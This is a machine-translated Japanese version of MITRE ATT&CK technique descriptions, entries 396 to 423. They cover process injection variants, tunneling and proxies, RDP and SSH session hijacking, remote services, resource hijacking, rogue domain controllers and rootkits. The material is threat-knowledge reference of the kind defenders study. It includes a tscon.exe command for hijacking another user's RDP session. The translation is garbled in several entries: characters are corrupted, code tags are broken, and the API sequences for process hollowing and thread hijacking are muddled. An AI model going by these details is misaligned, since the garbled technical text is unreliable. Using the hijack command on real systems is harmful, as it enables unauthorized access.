Windows Transactional NTFS (TxF) は、安全なファイル操作を行うための方法としてVistaで導入されました。(引用:Microsoft TxF) データの整合性を確保するため、TxFでは、ある時点で1つのトランザクテッドハンドルのみがファイルへの書き込みを可能にする。書き込みハンドルのトランザクションが終了するまで、他のすべてのハンドルは書き込み者から隔離され、ハンドルが開かれた時点で存在していたファイルのコミットされたバージョンのみを読むことができる。(引用:Microsoft Basic TxF Concepts) 破損を避けるため、TxFは書き込みトランザクション中にシステムやアプリケーションに障害が発生した場合、自動的にロールバックを実行する。(引用:Microsoft Where to use TxF)

非推奨ではあるが、TxFのアプリケーション・プログラミング・インターフェース(API)は、Windows 10の時点でも有効である。(Citation: BlackHat Process Doppelg?nging Dec 2017)

敵対者は、TxFを悪用して、[Process Injection](https://attack.mitre.org/techniques/T1055)のファイルレスバリエーションを実行することがあります。プロセス ホロイング](https://attack.mitre.org/techniques/T1055/012)と同様に、プロセス ドッペルグ?ニングでは、正規のプロセスのメモリを置き換えることで、防御や検出を回避する可能性のある悪意のあるコードをベールに包まれた状態で実行できます。また、プロセスドッペルギャンギングがTxFを使用することで、<code>NtUnmapViewOfSection</code>、<code>VirtualProtectEx</code>、<code>SetThreadContext</code>など、高度に監視されているAPI関数の使用を回避することができます。(Citation: BlackHat Process Doppelg?nging Dec 2017)

Process Doppelg?ngingは4つのステップで実装されます(Citation: BlackHat Process Doppelg?nging Dec 2017):

* Transact ?正当な実行ファイルを使ってTxFトランザクションを作成し、そのファイルを悪意のあるコードで上書きします。これらの変更は隔離され、トランザクションのコンテキスト内でのみ表示されます。
* Load ?メモリの共有セクションを作成し、悪意のある実行ファイルをロードします。
* Rollback ?元の実行ファイルへの変更を取り消し、ファイルシステムから悪意のあるコードを効果的に削除します。
* Animate ?汚染されたメモリセクションからプロセスを作成し、実行を開始します。

この動作では、注入されたプロセスが注入プロセスから生成された(したがって、セキュリティコンテキストを継承した)ため、特権が昇格することはないと思われます。しかし、プロセス・ドッペルギャンギングによる実行は、正規のプロセスの下で実行が隠蔽されるため、セキュリティ製品による検知を回避できる可能性があります。
396
T1055.012 プロセス射出。プロセス中空化 敵対者は、プロセスベースの防御を回避するために、一時停止したプロセスや空洞化したプロセスに悪意のあるコードを注入することがあります。

プロセスの空洞化は、一般的に、サスペンド状態のプロセスを作成し、そのメモリをアンマップ/空洞化することで実行されます。このとき、メモリは悪意のあるコードで置き換えられます。犠牲となるプロセスは、<code>CreateProcess</code>のようなWindowsのネイティブAPIコールで作成することができ、プロセスのプライマリスレッドをサスペンドするフラグが含まれています。この時点で、プロセスは書き込まれる前に<code>ZwUnmapViewOfSection</code>や<code>NtUnmapViewOfSection</code>などのAPIコールを使用してアンマップされ、注入されたコードに再調整され、<code>VirtualAllocEx</code</code>を介して再開されます。<code>VirtualAllocEx</code>、<code>WriteProcessMemory</code>、<code>SetThreadContext</code>、<code>ResumeThread</code>の順に再開されます。(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)

これは[Thread Local Storage](https://attack.mitre.org/techniques/T1055/005)と非常に似ていますが、既存のプロセスを対象とするのではなく、新しいプロセスを作成します。この動作では、注入されたプロセスが注入プロセスから生成された(つまり、セキュリティコンテキストを継承した)ため、特権が昇格することはないと思われます。しかし、プロセスの空洞化による実行は、正規のプロセスの下でマスクされるため、セキュリティ製品の検出を回避することもできます。
397
T1055.008 プロセスインジェクション。システムコールのPtrace 敵対者は、プロセスベースの防御を回避したり、特権を昇格させたりするために、ptrace(プロセストレース)システムコールを介してプロセスに悪意のあるコードを注入することがあります。

Ptraceシステムコールインジェクションは、実行中のプロセスに接続して変更することで、任意のコードを実行する手法です。ptraceシステムコールは、デバッグプロセスが他のプロセス(および個々のスレッド)を観察し、メモリやレジスタの値を変更するなどの制御を可能にします(引用:PTRACE man) Ptraceシステムコールインジェクションは、実行中のプロセスに任意のコードを書き込み(例:<code>malloc</code>)、そのメモリを<code>PTRACE_SETREGS</code>で呼び出して、次に実行する命令を含むレジスタを設定することでよく行われます。PTRACEのシステムコールインジェクションは、<code>PTRACE_POKETEXT</code>/<code>PTRACE_POKEDATA</code>でも行うことができ、対象プロセスのメモリの特定のアドレス(例:次の命令の現在のアドレス)にデータをコピーします。(引用:PTRACE man)(引用:Medium Ptrace JUL 2018)

Ptraceシステムコールインジェクションは、高い権限を持つプロセスや、一部のシステムでは、子プロセスではないプロセスを対象にできない場合があります。(引用:BH Linux Inject)

他のプロセスのコンテキストでコードを実行すると、そのプロセスのメモリ、システム/ネットワークリソースへのアクセスが可能になり、高い権限が与えられる可能性があります。また、ptraceシステムコールインジェクションによる実行は、正当なプロセスの下でマスクされるため、セキュリティ製品による検出を回避することができます。
398
T1055.003 プロセスインジェクション。スレッド実行ハイジャック 敵対者は、ハイジャックされたプロセスに悪意のあるコードを注入して、プロセスベースの防御を回避したり、特権を昇格させたりする可能性があります。

スレッド実行ハイジャックは、既存のプロセスをサスペンドし、そのメモリをアンマップ/追従して、悪意のあるコードやDLLへのパスに置き換えることで実行されます。既存の犠牲者プロセスへのハンドルは、まず<code>OpenThread</code>のようなWindowsのネイティブAPIコールで作成されます。この時点でプロセスは中断され、書き込まれ、注入されたコードに再調整され、<code>SuspendThread</code>や<code>VirtualAllocEx</code>を介して再開されます。VirtualAllocEx</code>、<code>WriteProcessMemory</code>、<code>SetThreadContext</code>、<code>ResumeThread</code> を介してそれぞれ再開することができます。(引用:Elastic Process Injection July 2017)

これは[Process Hollowing](https://attack.mitre.org/techniques/T1055/012)と非常によく似ていますが、サスペンド状態のプロセスを作成するのではなく、既存のプロセスを対象としています。

別のプロセスのコンテキストでコードを実行すると、プロセスのメモリ、システム/ネットワークリソースへのアクセスが可能になり、場合によっては昇格した特権が与えられる可能性があります。また、スレッド実行ハイジャックによる実行は、正当なプロセスの下でマスクされるため、セキュリティ製品による検知を回避できる可能性があります。
399
T1055.005 プロセス・インジェクション。スレッドローカルストレージ 侵入者は、プロセスベースの防御を回避したり、特権を昇格させたりするために、スレッドローカルストレージ(TLS)のコールバックを介してプロセスに悪意のあるコードを注入することがあります。

TLS コールバックインジェクションは、ポータブルエグゼキュータブル(PE)内のポインタを操作して、コードの正当なエントリポイントに到達する前にプロセスを悪意のあるコードにリダイレクトします。TLS コールバックは、通常、OS がスレッドで使用するデータのセットアップやクリーンアップに使用します。TLSコールバックの操作は、[Process Hollowing](https://attack.mitre.org/techniques/T1055/012)などの他の[Process Injection](https://attack.mitre.org/techniques/T1055)技術を使用して、プロセスのメモリ空間内の特定のオフセットに割り当てたり書き込んだりすることで実行される可能性があります。(引用:FireEye TLS Nov 2017)

他のプロセスのコンテキストでコードを実行すると、プロセスのメモリ、システム/ネットワークリソースへのアクセスが可能になり、特権が昇格する可能性があります。また、TLSコールバックインジェクションによる実行は、正当なプロセスの下でマスクされるため、セキュリティ製品の検知を回避できる可能性があります。
400
T1055.014 プロセスインジェクション。VDSOのハイジャック 敵対者は、VDSO のハイジャックによってプロセスに悪意のあるコードを注入し、プロセスベースの防御を回避したり、特権を昇格させたりする可能性があります。

VDSO ハイジャッキングでは、動的にリンクされた共有ライブラリへの呼び出しをリダイレクトすることで、任意のコードを別のライブプロセスのアドレス空間で実行します。メモリ保護機能により、[Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008)経由でプロセスに実行可能なコードを書き込むことはできません。しかし、敵対者は、VDSO共有オブジェクトからプロセスにマップされたシステムコールインターフェイスコードスタブをハイジャックして、悪意のある共有オブジェクトをオープンしたりマップしたりするためのシステムコールを実行する可能性があります。このコードは、プロセスのグローバルオフセットテーブル(マッピングされたライブラリ関数の絶対アドレスが格納されている)に格納されているパッチされたメモリアドレス参照を介して、プロセスの実行フローをリダイレクトすることで呼び出すことができます。(引用: ELF Injection May 2009) (引用: Backtrace VDSO) (引用: VDSO Aug 2005) (引用: Syscall 2014)

他のプロセスのコンテキストでコードを実行すると、そのプロセスのメモリ、システム/ネットワークリソースへのアクセスが可能になり、場合によっては昇格した特権が与えられる可能性があります。また、VDSOのハイジャックによる実行は、正規のプロセスの下でマスクされるため、セキュリティ製品の検知を回避できる可能性があります。
401
T1572 プロトコル・トンネリング 侵入者は、被害者のシステムとの間のネットワーク通信を別のプロトコルでトンネル化することで、検知やネットワークフィルタリングを回避したり、通常は到達できないシステムへのアクセスを可能にしたりすることがあります。トンネリングとは、あるプロトコルを別のプロトコルに明示的にカプセル化することです。この動作は、既存のトラフィックに紛れ込ませることで悪意のあるトラフィックを隠したり、(VPNに似た)外側の暗号化レイヤーを提供したりします。トンネリングは、SMB、RDPなど、ネットワーク機器でフィルタリングされたり、インターネット上でルーティングされないようなトラフィックなど、通常であれば目的の宛先に到達しないネットワークパケットのルーティングを可能にすることもできます。

プロトコルを別のプロトコルにカプセル化する手段はさまざまです。例えば、敵対者は、暗号化されたSSHトンネル上に任意のデータを転送するSSHトンネリング(SSHポートフォワーディングとも呼ばれる)を実行することができます。(引用:SSHトンネリング)

[プロトコルのトンネリング](https://attack.mitre.org/techniques/T1572)は、[動的解決](https://attack.mitre.org/techniques/T1568)の際にも敵対者に悪用される可能性があります。DNS over HTTPS (DoH)として知られており、C2インフラストラクチャを解決するためのクエリは、暗号化されたHTTPSパケット内にカプセル化されることがあります。(引用: BleepingComp Godlua JUL19)

敵対者は、[Proxy](https://attack.mitre.org/techniques/T1090)および/または[Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003)と組み合わせて[Protocol Tunneling](https://attack.mitre.org/techniques/T1572)を活用し、C2通信およびインフラストラクチャをさらに隠蔽することも考えられます。
402
T1090 プロキシ 敵対者は、接続プロキシを使用してシステム間のネットワークトラフィックを誘導したり、コマンド&コントロールサーバへのネットワーク通信の仲介を行うことで、自分のインフラへの直接接続を回避することができます。HTRAN](https://attack.mitre.org/software/S0040)、ZXProxy、ZXPortMapなど、プロキシによるトラフィックのリダイレクションやポートのリダイレクションを可能にするツールが多く存在します。(敵対者は、これらのタイプのプロキシを使用して、コマンド&コントロールの通信を管理したり、同時に送信されるネットワーク接続の数を減らしたり、接続が切断された場合の回復力を提供したり、疑惑を回避するために被害者間の既存の信頼できる通信経路に乗ったりします。敵対者は、悪意のあるトラフィックの送信元をさらに偽装するために、複数のプロキシを連鎖させることがあります。

また、敵対者は、コンテンツ配信ネットワーク(CDN)のルーティング・スキームを利用して、コマンド・コントロール・トラフィックをプロキシすることもできます。
403
T1090.004 プロキシドメインフロンティング 敵対者は、複数のドメインをホストするコンテンツ・デリバリー・ネットワーク(CDN)やその他の サービスのルーティング・スキームを利用して、HTTPS トラフィックや HTTPS を介してトンネル接続されたトラ フィックの目的地を不明瞭にする可能性があります。(引用Fifield Blocking Resistent Communication through domain fronting 2015)。)ドメインフロンティングとは、TLSヘッダーのSNIフィールドとHTTPヘッダーのHostフィールドに異なるドメイン名を使用することです。両方のドメインが同じCDNから提供されている場合、CDNはTLSヘッダーをアンラップした後、HTTPヘッダーで指定されたアドレスにルーティングすることができます。

例えば、domain-x と domain-y が同じ CDN の顧客である場合、TLS ヘッダーに domain-x を、HTTP ヘッダーに domain-y を配置することができます。トラフィックは、ドメイン-xに向かっているように見えますが、CDNはそれをドメイン-yにルーティングすることができます。
404
T1090.002 プロキシ外部プロキシ 敵対者は、自分のインフラへの直接接続を避けるために、コマンド&コントロールサーバへのネットワーク通信に外部プロキシを使って仲介することがあります。HTRAN](https://attack.mitre.org/software/S0040)、ZXProxy、ZXPortMapなど、プロキシによるトラフィックのリダイレクションやポートのリダイレクションを可能にするツールは数多く存在します。(

外部接続プロキシは、C2トラフィックの送信先を隠すために使用され、通常はポート リダイレクタとともに実装されます。これらの目的には、クラウドベースのリソースや仮想プライベート サーバーなどの購入したインフラだけでなく、被害者環境の外部にある侵害されたシステムが使用されることがあります。プロキシは、侵害されたシステムからプロキシへの接続が調査される可能性が低いことに基づいて選択される場合があります。被害者のシステムは、インターネット上の外部プロキシと直接通信し、プロキシがC2サーバに通信を転送します。
405
T1090.001 プロキシ内部プロキシ 敵対者は、内部プロキシを使用して、侵害された環境内の2つ以上のシステム間でコマンドおよび制御トラフィックを指示することがあります。HTRAN](https://attack.mitre.org/software/S0040)、ZXProxy、ZXPortMapなど、プロキシやポートリダイレクションによるトラフィックのリダイレクトを可能にするツールは数多く存在します。(引用:Trend Micro APT Attack Tools) 敵対者は、侵害された環境内のコマンド&コントロール通信を管理するため、同時に送信するネットワーク接続の数を減らすため、接続が失われた場合の回復力を提供するため、あるいは感染したシステム間の既存の信頼できる通信経路に乗って疑われないようにするために、内部プロキシを使用します。内部プロキシ接続では、環境にうまく溶け込むために、SMBなどの一般的なピアツーピア(p2p)ネットワーク プロトコルを使用することができます。

侵害された内部システムをプロキシとして使用することで、敵対者は、外部システムへの多数の接続の必要性を低減しながら、C2トラフィックの真の送信先を隠すことができます。
406
T1090.003 プロキシマルチホッププロキシ 悪意のあるトラフィックの送信元を偽装するために、敵対者は複数のプロキシを連結することがある。通常、防御側は、トラフィックがネットワークに入る前に最後に通過したプロキシを特定することができますが、最後に通過したプロキシ以前のプロキシを特定できるかどうかはわかりません。この手法では、悪意のあるトラフィックの送信元を特定するために、防御側が複数のプロキシを経由して悪意のあるトラフィックを追跡する必要があるため、悪意のあるトラフィックの元の送信元を特定することがさらに困難になります。この動作の特定の変種は、公開されているTORネットワークなどのオニオンルーティングネットワークを使用することです。(引用:Onion Routing)

ネットワークインフラストラクチャ、特にルータの場合、敵対者が複数の危険なデバイスを利用して、企業のワイドエリアネットワーク(WAN)内にマルチホップのプロキシチェーンを作成することが可能です。 パッチシステムイメージ](https://attack.mitre.org/techniques/T1601/001)を利用することで、被害を受けたネットワーク機器にカスタムコードを追加し、それらのノード間にオニオンルーティングを実装することができます。 このカスタムオニオンルーティングネットワークは、暗号化されたC2トラフィックを侵害された母集団を介して伝送し、敵対者がオニオンルーティングネットワーク内の任意のデバイスと通信できるようにします。 この方法は、敵対者がインターネット境界の保護されたネットワーク境界を越えて組織のWANに入ることを可能にするために、[Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)方法に依存しています。トランスポートとしてICMPなどのプロトコルを使用することができる。
407
T1012 問い合わせ登録

レジストリには、オペレーティングシステム、構成、ソフトウェア、およびセキュリティに関する大量の情報が含まれています。(引用:Wikipedia Windows Registry) 情報は、[Reg](https://attack.mitre.org/software/S0075)ユーティリティーを使用して簡単に照会できますが、レジストリにアクセスする他の方法もあります。情報の中には、敵対者がネットワーク内での活動を促進するのに役立つものもあります。敵対者は、自動発見の際に[Query Registry](https://attack.mitre.org/techniques/T1012)からの情報を利用して、敵対者がターゲットを完全に感染させるかどうかや、特定のアクションを試みるかどうかなど、その後の行動を形成することがあります。
408
T1219 リモートアクセスソフトウェア 敵対者は、Team Viewer、Go2Assist、LogMein、AmmyyAdminなどの正当なデスクトップ・サポート・ソフトウェアやリモート・アクセス・ソフトウェアを使用して、ネットワーク内のターゲット・システムへのインタラクティブなコマンド・アンド・コントロール・チャネルを確立することができます。これらのサービスは、通常、正当な技術サポートソフトウェアとして使用されており、ターゲット環境内のアプリケーション制御によって許可される場合があります。VNC、Ammyy、Teamviewerなどのリモートアクセスツールは、敵対者が一般的に使用する他の正当なソフトウェアと比較して、頻繁に使用されています。(引用:Symantec Living off the Land)

リモートアクセスツールは、危殆化した後に、冗長なアクセスのための代替通信チャネルとして、またはターゲットシステムとの対話型リモートデスクトップセッションを確立するための手段として、確立され使用されることがあります。

TeamViewerなどの管理ツールは、ロシア国家や犯罪キャンペーンが関心を持つ国の機関をターゲットにした複数のグループによって使用されています。(引用:CrowdStrike 2015 Global Threat Report) (引用:CrySyS Blog TeamSpy)
409
T1563 リモートサービスのセッションハイジャック 敵対者は、リモートサービスの既存のセッションを制御して、環境内を横方向に移動することができます。ユーザーは、有効な認証情報を使用して、telnet、SSH、RDP などのリモート接続を受け付けるように特別に設計されたサービスにログインすることができます。ユーザーがサービスにログインすると、そのサービスとの継続的なやり取りを可能にするセッションが確立されます。

敵対者は、これらのセッションを乗っ取って、リモートシステム上でアクションを実行する可能性があります。[リモート・サービス・セッション・ハイジャック](https://attack.mitre.org/techniques/T1563)は、[リモート・サービス](https://attack.mitre.org/techniques/T1021)の使用とは異なり、[有効なアカウント](https://attack.mitre.org/techniques/T1078)を使用して新しいセッションを作成するのではなく、既存のセッションをハイジャックします。(引用:RDP Hijacking Medium)(引用:Breach Post-mortem SSH Hijack)
410
T1563.002 リモートサービス・セッション・ハイジャッキングRDPハイジャッキング 敵対者は、正当なユーザーのリモートデスクトップセッションを乗っ取り、環境内で横方向に移動することがあります。リモートデスクトップは、オペレーティングシステムの一般的な機能です。リモートデスクトップとは、オペレーティングシステムの一般的な機能で、ユーザーがリモートシステム上のシステムデスクトップのグラフィカルユーザーインターフェースとのインタラクティブなセッションにログインすることができます。マイクロソフトでは、リモート・デスクトップ・プロトコル(RDP)の実装をリモート・デスクトップ・サービス(RDS)と呼んでいます。(引用:TechNet Remote Desktop Services)

敵対者は、正当なユーザーのリモート・セッションを盗むRDPセッション・ハイジャックを行うことがあります。通常、セッションを盗もうとしている人がいると、ユーザーに通知されます。システム権限を持ち、ターミナルサービスコンソールの「c:windows/system32/tscon.exe [session number to be stolen]」を使用すると、認証情報やユーザーへのプロンプトを必要とせずにセッションをハイジャックすることができます。(引用:RDP Hijacking Korznikov) これは、リモートまたはローカルで、またアクティブまたは切断されたセッションで行うことができます。(引用:RDP Hijacking Medium) また、[Remote System Discovery](https://attack.mitre.org/techniques/T1018)や、ドメイン管理者以上の特権アカウントのセッションを盗むことで、特権の昇格につながる可能性もあります。これらはすべて、Windowsのネイティブコマンドを使って行うことができますが、レッドチーミングツールの機能としても追加されています。
411
T1563.001 リモートサービス・セッション・ハイジャッキングSSHハイジャッキング 敵対者は、正当なユーザーのSSHセッションを乗っ取り、環境内で横方向に移動することがあります。Secure Shell(SSH)は、LinuxおよびmacOSシステムにおけるリモートアクセスの標準的な手段です。

侵害されたホストから横方向に移動するために、敵対者は、他のシステムへの既存の接続をハイジャックすることで、アクティブなSSHセッションにおける公開鍵認証によって確立された他のシステムとの信頼関係を利用することができます。これは、SSHエージェント自体が危険にさらされたり、エージェントのソケットにアクセスしたりすることで起こる可能性があります。もし敵がルート・アクセスを得ることができれば、SSHセッションをハイジャックすることはたぶん些細なことでしょう。(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)

[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001)は、[Valid Accounts](https://attack.mitre.org/techniques/T1078)を使って新しいセッションを作るのではなく、既存のSSHセッションをハイジャックするという点で、[SSH](https://attack.mitre.org/techniques/T1021/004)の使用とは異なります。
412
T1021 リモートサービス 敵対者は、[Valid Accounts](https://attack.mitre.org/techniques/T1078)を使用して、telnet、SSH、VNCなどのリモート接続を受け付けるように特別に設計されたサービスにログインすることができます。そして、敵対者は、ログオンしたユーザとしてアクションを実行することができます。

企業環境では、サーバーやワークステーションをドメインに編成することができます。ドメインは、集中的なアイデンティティ管理を提供し、ユーザがネットワーク全体で1つの認証情報を使用してログインできるようにします。もし敵が有効なドメイン認証情報のセットを得ることができれば、セキュアシェル(SSH)やリモートデスクトッププロトコル(RDP)などのリモートアクセスプロトコルを使用して、さまざまなマシンにログインすることができます(引用:SSH Secure Shell)(引用:TechNet Remote Desktop Services
413
T1021.003 リモートサービス。分散コンポーネントオブジェクトモデル 敵対者は、[Valid Accounts](https://attack.mitre.org/techniques/T1078)を使用して、DCOM(Distributed Component Object Model)を利用してリモートマシンとやり取りすることがあります。そして、敵対者はログオンしたユーザーとしてアクションを実行することができます。

Windowsのコンポーネント・オブジェクト・モデル(COM)は、Windowsのネイティブ・アプリケーション・プログラミング・インターフェース(API)のコンポーネントであり、ソフトウェア・オブジェクト(1つ以上のインターフェースを実装した実行コード)間の相互作用を可能にする。クライアントオブジェクトは、ダイナミックリンクライブラリ(DLL)や実行ファイル(EXE)であるサーバーオブジェクトのメソッドを呼び出すことができます。分散COM(DCOM)は、リモートプロシージャコール(RPC)技術を使用してCOMの機能をローカルコンピュータを超えて拡張する透過的なミドルウェアである。(引用:Fireeye Hunting COM 2019年6月号)(引用:Microsoft COM)

ローカルおよびリモートのサーバーCOMオブジェクトと対話するための権限は、レジストリ内のアクセス制御リスト(ACL)によって指定される。(引用:Microsoft Process Wide Com Keys) デフォルトでは、管理者のみがDCOMを介してCOMオブジェクトをリモートで起動し、起動することができる。(引用:Microsoft COM ACL)

DCOMを介して、適切な特権ユーザーのコンテキストで操作する敵対者は、Officeアプリケーション(引用:Enigma Outlook DCOM Lateral Movement Nov 2017)や、安全でないメソッドを含む他のWindowsオブジェクトを介して、任意の、さらには直接のシェルコードの実行をリモートで取得することができます。(引用:Enigma MMC20 COM 2017年1月)(引用:Enigma DCOM Lateral Movement 2017年1月)DCOMは、既存のドキュメント内でマクロを実行することもでき(引用:Enigma Excel DCOM 2017年9月)、また、悪意のあるドキュメントの必要性を回避して、Microsoft OfficeアプリケーションのCOMで作成されたインスタンスを介して直接DDE(Dynamic Data Exchange)の実行を呼び出すこともできます(引用:Cyberreason DCOM DDE Lateral Movement 2017年11月)。
414
T1021.001 リモートサービス。リモートデスクトッププロトコル 敵対者は、[Valid Accounts](https://attack.mitre.org/techniques/T1078)を使用して、リモート・デスクトップ・プロトコル(RDP)を使用するコンピュータにログインする可能性があります。その後、敵対者はログオンしたユーザーとしてアクションを実行することができます。

リモート・デスクトップは、オペレーティング・システムの一般的な機能です。リモート・デスクトップは、オペレーティングシステムの一般的な機能で、ユーザーがリモート・システム上のシステム・デスクトップ・グラフィカル・ユーザー・インターフェースとのインタラクティブなセッションにログインすることを可能にします。マイクロソフトでは、リモートデスクトッププロトコル(RDP)の実装をリモートデスクトップサービス(RDS)と呼んでいます。(引用:TechNet Remote Desktop Services)

サービスが有効で、既知の認証情報を持つアカウントへのアクセスが許可されている場合、敵対者はRDP/RDSを介してリモートシステムに接続し、アクセスを拡大することがあります。敵対者は、RDPで使用する資格情報を取得するために資格情報アクセス技術を使用する可能性があります。また、敵対者は、RDPを[Accessibility Features](https://attack.mitre.org/techniques/T1546/008)技術と組み合わせて、持続的に使用することもあります。(引用:Alperovitch Malware)
415
T1021.002 リモートサービス。SMB/Windows Admin Shares 敵対者は、[Valid Accounts](https://attack.mitre.org/techniques/T1078)を使用して、Server Message Block(SMB)を使用するリモートネットワーク共有とやり取りすることがあります。そして、ログオンしているユーザーとしてアクションを実行することができます。

SMBは、同じネットワークやドメイン上にあるWindowsマシンのための、ファイル、プリンタ、シリアルポートの共有プロトコルです。敵対者は、SMB を使用してファイル共有を操作し、ネットワーク内を横方向に移動することができます。

Windowsシステムには、管理者のみがアクセスできる隠しネットワーク共有があり、リモートでのファイルコピーやその他の管理機能が提供されています。ネットワーク共有の例としては、`C$`、`ADMIN$`、`IPC$`などがある。敵対者は、管理者レベルの[Valid Accounts](https://attack.mitre.org/techniques/T1078)と組み合わせてこの技術を使用し、SMBを介してネットワーク上のシステムにリモートアクセスしたり、(引用:Wikipedia Server Message Block)リモートプロシージャコール(RPC)を使用してシステムとやり取りしたり、(引用:TechNet RPC)ファイルを転送したり、転送されたバイナリをリモート実行したりすることができます。SMB/RPC上の認証されたセッションに依存する実行技術の例としては、[Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)、[Service Execution](https://attack.mitre.org/techniques/T1569/002)、[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)などがあります。また、[Pass the Hash](https://attack.mitre.org/techniques/T1550/002)が適用され、特定の設定やパッチレベルが適用されたシステムでは、敵対者はNTLMハッシュを使用して管理者共有にアクセスすることができます。(引用:Microsoft Admin Shares)
416
T1021.004 リモートサービス。SSH 敵対者は、[Valid Accounts](https://attack.mitre.org/techniques/T1078)を使用して、Secure Shell(SSH)を使用するリモートマシンにログインすることができます。そして、敵対者は、ログオンしたユーザーとしてアクションを実行することができます。

SSHは、許可されたユーザーが他のコンピュータ上でリモートシェルを開くことができるプロトコルです。LinuxやmacOSの多くのバージョンには、デフォルトでSSHがインストールされていますが、通常、ユーザーが有効にするまでは無効になっています。SSH サーバーは、標準的なパスワード認証、またはパスワードの代わりに、またはパスワードに加えて公開-秘密鍵ペアを使用するように設定できます。この認証シナリオでは、ユーザーの公開鍵は、サーバーを実行しているコンピュータ上の特別なファイルの中になければならず、そのファイルには、どの鍵ペアがそのユーザーとしてログインすることを許可するかがリストアップされている。(引用:SSH Secure Shell)
417
T1021.005 リモートサービス。VNC 敵対者は、[Valid Accounts](https://attack.mitre.org/techniques/T1078)を使用して、Virtual Network Computing(VNC)を使ってマシンを遠隔操作する可能性があります。そして、敵対者はログオンしたユーザーとしてアクションを実行することができます。

VNCはデスクトップ共有システムで、マウスやキーボードの入力をネットワーク経由で中継することで、他のコンピュータのディスプレイを遠隔操作することができます。VNCは、必ずしも標準的なユーザー認証情報を使用しません。その代わり、VNCクライアントとサーバーには、VNC接続にのみ使用される認証情報が設定されている場合があります。
418
T1021.006 リモートサービス。Windowsリモートマネジメント 敵対者は、[Valid Accounts](https://attack.mitre.org/techniques/T1078)を使用して、Windows Remote Management(WinRM)を使用するリモートシステムとやり取りすることがあります。そして、敵対者はログオンしているユーザーとしてアクションを実行することができます。

WinRMとは、Windowsのサービス名であると同時に、ユーザーがリモートシステムと対話(実行ファイルの実行、レジストリの変更、サービスの変更など)するためのプロトコル名でもあります(引用:Microsoft WinRM)`winrm`コマンドやPowerShellなどの任意のプログラムで呼び出すことができます(引用:Jacobsen 2014)。
419
T1018 リモートシステムディスカバリー 敵対者は、IPアドレス、ホスト名、またはネットワーク上のその他の論理的な識別子によって、現在のシステムからの横移動に使用される可能性のある他のシステムのリストを取得しようとするかもしれません。これを可能にする機能は、リモートアクセスツールの中にあるかもしれませんが、[Ping](https://attack.mitre.org/software/S0097)や[Net](https://attack.mitre.org/software/S0039)を使った<code>ネットビュー</code>のような、オペレーティングシステム上で利用可能なユーティリティを使用することもできます。また、リモートシステムのホスト名とIPアドレスのマッピングを発見するために、ローカルホストファイル(例:<code>C:Windows\System32\Drivers\etc\hosts</code>または<code>/etc/hosts</code>)を使用することもできます。

macOSに特有のプロトコルとして、同じブロードキャストドメイン内の追加のMacベースのシステムを発見するための<code>bonjour</code>があります。
420
T1091 リムーバブルメディアによるレプリケーション 敵対者は、マルウェアをリムーバブルメディアにコピーし、リムーバブルメディアがシステムに挿入されて実行される際の自動実行機能を利用することで、切断されたネットワークやエアギャップのあるネットワーク上のシステムに移動することがあります。横移動の場合は、リムーバブルメディアに保存されている実行ファイルを修正したり、マルウェアをコピーして正規のファイルに見えるように名前を変更し、ユーザーを騙して別のシステムで実行させたりすることで起こります。初期アクセスの場合は、メディアを手動で操作したり、メディアの初期フォーマットに使用するシステムを変更したり、メディアのファームウェア自体を変更したりすることで起こります。 421
T1496 リソースハイジャック 敵対者は、システムおよび/またはホストされたサービスの可用性に影響を与える可能性のあるリソース集中型の問題を解決するために、共同利用されたシステムのリソースを活用する可能性があります。

リソースハイジャックの一般的な目的の1つは、暗号通貨ネットワークのトランザクションを検証し、仮想通貨を獲得することです。敵対者は十分なシステムリソースを消費して、影響を受けるマシンに悪影響を与えたり、反応しなくなったりする可能性があります(引用:Kaspersky Lazarus Under The Hood Blog 2017)サーバーやクラウドベースのシステム(引用:CloudSploit - Unused AWS Regions)は、利用可能なリソースの可能性が高いため、一般的なターゲットとなりますが、ユーザーのエンドポイントシステムが侵害され、リソースハイジャックや暗号通貨マイニングに利用されることもあります。また、コンテナ環境は、公開されているAPIを利用して簡単にデプロイできることや、環境やクラスタ内に複数のコンテナをデプロイしたり侵害したりすることでマイニング活動を拡大できる可能性があるため、標的になることがあります。(引用:Unit 42 Hildegard Malware)(引用:Trend Micro Exposed Docker APIs)

さらに、暗号通貨マイニングマルウェアの中には、競合するマルウェアのプロセスを削除して、リソースを競合させないようにするものもあります。(引用:Trend Micro War of Crypto Miners)
422
T1207 不正なドメインコントローラー 侵入者は、不正なドメインコントローラーを登録して、Active Directoryデータの操作を可能にすることがあります。DCShadowは、不正なドメインコントローラー(DC)を作成するために使用されることがあります。DCShadowとは、DCを登録(または無効な登録を再利用)し、その動作をシミュレートすることで、オブジェクトやスキーマを含むActive Directory(AD)のデータを操作する手法です。(

不正なDCを登録するには、ADスキーマのConfigurationパーティションに新しいサーバーとnTDSDSAオブジェクトを作成する必要があり、これにはAdministrator権限(ドメインまたはDCのローカル)またはKRBTGTハッシュが必要である。(引用:Adsecurity Mimikatz Guide)

この技術は、システムログやセキュリティ情報・イベント管理(SIEM)製品などのセキュリティモニターを回避する可能性があります(不正なDCで行われたアクションは、これらのセンサーに報告されない可能性があるため)。(また、フォレンジック分析を妨害するために、レプリケーションやその他の関連メタデータを変更・削除するために使用される可能性もあります。また、敵対者はこの技術を利用して、[SID-History Injection](https://attack.mitre.org/techniques/T1134/005)を実行したり、ADオブジェクト(アカウント、アクセス制御リスト、スキーマなど)を操作して、Persistence用のバックドアを構築することも考えられます。(引用:DCShadowブログ)
423
T1014 ルートキット 敵対者は、プログラム、ファイル、ネットワーク接続、サービス、ドライバー、その他のシステムコンポーネントの存在を隠すためにルートキットを使用することがあります。ルートキットとは、システム情報を提供するオペレーティング・システムのAPIコールをインターセプト/フックして変更することにより、マルウェアの存在を隠蔽するプログラムです。(引用:Symantec Windows Rootkits)

